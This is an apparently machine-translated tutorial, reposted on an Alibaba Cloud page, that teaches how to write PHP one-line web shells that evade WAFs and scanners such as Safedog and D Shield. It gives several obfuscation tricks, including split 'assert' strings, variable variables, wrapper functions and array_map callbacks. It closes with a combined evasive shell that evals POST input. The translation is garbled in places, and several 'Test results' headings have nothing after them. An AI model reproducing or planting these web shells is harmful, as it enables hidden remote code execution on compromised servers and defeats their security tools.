PHP A word over the dog, Guardian, D Shield, such as free from the idea of killing!

Source: Internet
Author: User

Original reproduced in: http://www.legendsec.org/1701.html

I think the writing is quite popular.

00x1. Keyword splitting.
such as Assert, can be written as ' a '. SS '. ' E '. ' R '. ' T ' so.
Summary: Although this method is simple, but it does not have too strong to avoid killing effect, need to combine other methods.

00x2. mutable variables, references, mutable functions.

Variable variables such as $a=$_post[' X ']; $b = ' a '; @eval ($ $b);
Test results:
Summary: This approach to the dog and other WAF can be bypassed Oh ~ but for D shield this multi-rule is invalid!

References such as $a=$_post[' X ']; $b =& $a; @eval ($b);
Test results:

Summary: This approach is similar to the previous method.

Variable functions such as $a= ' a '. ' SS '. ' E '. ' R '. ' T '; $a ($_post[' x ');
Test results:
Summary: This method for dogs, 3 guards, D shield and so on are no effect oh ~

00x3. Add additional code.

Add additional code such as if (empty ($a))

                                        {
                                              $a =$_post[' x '];
                                        }

@eval ($a);
Test results:
Summary: This method is more suitable for the big brain hole small partners ~

00x4. function substitution.

Use other functions, such as Eval, to replace with an assert.


Summary: This method is suitable for use when the Eval function is disabled oh ~

00x5. Encapsulation into the new function.

A new function is defined so that it is encapsulated in a new function.

function test ($a) {//define an operation named Test and use $ A to accept the argument

eval ($a);

}

Test ($_post[' x ']);

Test results:
Summary: This method is suitable for PHP-based people Oh, posture coquettish ~ not afraid of!

00x6. Function callback.

Calls are made using other functions and executed.

such as: Array_map (' a '. ') S '. ' Se '. ' R '. ' T ', Array ($_post[' x '));
Test Results:
Summary: This method is suitable for people with PHP Foundation Oh ~ This method is definitely over the WAF Oh ~


00x7. Use the features of various methods to write a word about a WAF.
<?php
function test ($a) {//Take advantage of the learned encapsulation function
if (empty ($a)) {//Take advantage of the learning to add additional code
$a = "echo ' qq:xxxxxxx ';"; Use this code to disrupt D-Shield's judgment.
}
@eval ($a);
}
@test ($_post[' x ']);
?>


Test Results:

The END

PHP A word over the dog, Guardian, D Shield, such as free from the idea of killing!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.